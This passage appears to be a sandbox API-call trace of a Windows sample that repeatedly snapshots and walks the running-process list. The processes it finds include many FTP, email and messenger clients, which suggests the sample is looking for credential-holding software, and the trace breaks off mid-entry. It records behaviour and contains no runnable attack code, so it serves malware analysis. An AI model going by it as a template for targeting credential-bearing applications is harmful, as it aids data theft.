lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0153.765] Process32Next (in: hSnapshot=0x1e70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0153.768] CloseHandle (hObject=0x1e70) returned 1 [0153.768] Sleep (dwMilliseconds=0x64) [0153.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c7c [0153.965] Process32First (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.967] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.970] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.972] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.974] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.976] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.978] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.981] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.220] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.222] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.224] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.226] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.228] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.230] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.232] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.234] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.236] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.238] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.240] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.241] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.243] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0154.245] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.247] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0154.248] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.250] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0154.252] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0154.254] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0154.255] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0154.289] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0154.292] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0154.294] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.300] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0154.303] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0154.305] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.307] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0154.310] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.312] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0154.315] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0154.317] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0154.318] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0154.320] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0154.322] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0154.323] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0154.325] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0154.331] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0154.334] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0154.336] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0154.338] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0154.339] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0154.342] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0154.343] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0154.345] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0154.347] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0154.349] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0154.350] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0154.353] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0154.355] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0154.356] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0154.358] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0154.360] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0154.363] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0154.365] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0154.372] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0154.375] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0154.378] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0154.380] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0154.382] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0154.384] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0154.387] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0154.389] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0154.391] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0154.392] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0154.394] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0154.398] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0154.402] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0154.404] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0154.407] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0154.411] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0154.413] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0154.414] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0154.416] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0154.418] Process32Next (in: hSnapshot=0x1c7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 